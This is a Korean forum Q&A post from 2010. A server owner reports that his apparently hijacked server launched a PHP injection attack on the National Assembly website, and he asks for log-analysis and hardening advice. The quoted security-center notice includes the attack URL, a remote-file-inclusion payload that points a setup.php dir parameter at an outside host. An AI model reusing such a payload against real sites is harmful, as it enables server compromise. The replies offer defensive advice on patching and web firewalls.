제서버가 PHP injection 공격을 당해서 제가 국회 홈피를 해킹시도한걸로 오인받았습니다.

박병희   
   조회 9091   추천 0    

내용은 아래와 같습니다.

 저는 해킹시도한적이 없는데 누가 제서버를 거쳐서 아래와 같이 공격을 시도해서

 제가 해킹한걸로 오해를 받고 있습니다.

 이거 어떻게 대처해야 될까요?

 로그 분석 방법과 재발 대처방법에 대하여 조언을 부탁드립니다(__)


-------------------------------------------------------
KT 스팸대응센터
 
Tel : 080-223-xxx
E-mail : ***@******.net

----- Original Message -----
From: 국회보안관제센터
To: ***@******.net ; ***@******.net ; ***@*****.kornet.net
Sent: Friday, January 08, 2010 5:07 AM
Subject: KT에 할당된 아이피에서 침해시도가 발생 하였습니다. -국회보안관제센터-


 
안녕하십니까.
 
국회 보안관제센터입니다.
 
KT에 할당된 아이피 125.141.91.xxx에서 국회 웹서버로 PHP injection 공격이 발생 했습니다.
 
-일시 2010년 1월 8일 오전 3시 6분경
 
-src IP : 125.141.91.xxx
 
-dst IP : 211.46.92.xxx
 
-공격 내용 : PHP인젝션
 
-공격URL =  www.***.go.kr/renew07/anc/notice/popup_mng/popup_vw.j&hellip://skin/sirini_simplism_gallery_v4/setup.php?dir=http://musicadelibreria.net/footer??
 
상기 내역은 보안상 로그중 일부만 발췌하여 공개 하였으며, src IP에 대해 80포트로 접속 해 본 결과
 
웹서버로 확인되어 해당 아이피에 대해 차단 하였습니다.
 

 
 
조치 후 회신 요청 드립니다.
 
수고하십시요.
 
 
국회 보안관제센터
 
02-786-xxxx
짧은글 일수록 신중하게.
투시피유 2010-01
와 정말 황당하시겠네요..
도움은 못되어 드리지만 잘 해결되길 겁니다.
푸릉이 2010-01
뭐 그러려니 하면 되지 않을까요? 그쪽에서도 머라고 하지 않는이상...^^ 두발 뻗고 편희 주무세요..
딸기대장 2010-01
국회홈피에 안들어가면 되지않나요? ^^
몽몽 2010-01
리눅스인지 윈도우인지...?

일단 시스템 뚫렸으니 서버가 무결성이 없는 상태입니다.
시스템을 최신 업데이트로 새로 설치하세요.

그리고 서버 보안상 문제발생으로 인한 사고였으며, 미안하며, 즉각 보안조치를 취하였고 , 향후 재발생되지 않도록 하겠다 라는 내용으로 회신해주면 됩니다.
이현호K 2010-01
Skin도 보이고, v4 가 있는거 보니까, 제로보드 4 url 가지고 장난친듯 하네요.
제로보드 보안 강화하시거나, 업그레이드 하셔야되겠네요. zero v4는 정말 문제 많습니다. 악용소지..

웹서버 인젝션 공격에 대응하시려면, 웹서버 Firewall ModSecurity를 잘 활용하시는것도 한방법입니다.
http://www.modsecurity.org/documentation/

서버 기본 보안도 철저히 하셔야 누명쓰는 일이 없습니다.


QnA
제목Page 4085/5727
2014-05   5249656   정은준1
2015-12   1774941   백메가
2010-01   9318   psj1050
2010-01   6753   일반유저
2010-01   16080   전근현
2010-01   9329   김진현
2010-01   13472   박동섭
2010-01   7303   손경화
2010-01   6977   나너우리
2010-01   9617   방o효o문
2010-01   6670   가빠로구나
2010-01   6655   song05
2010-01   10790   윤영돈
2010-01   13267   푸릉이
2010-01   9282   윤경식
2010-01   11226   푸릉이
2010-01   7757   백승철
2010-01   9065  
2010-01   6888   송석근
2010-01   8410   psj1050
2010-01   8655   손경화
2010-01   7934   Hilm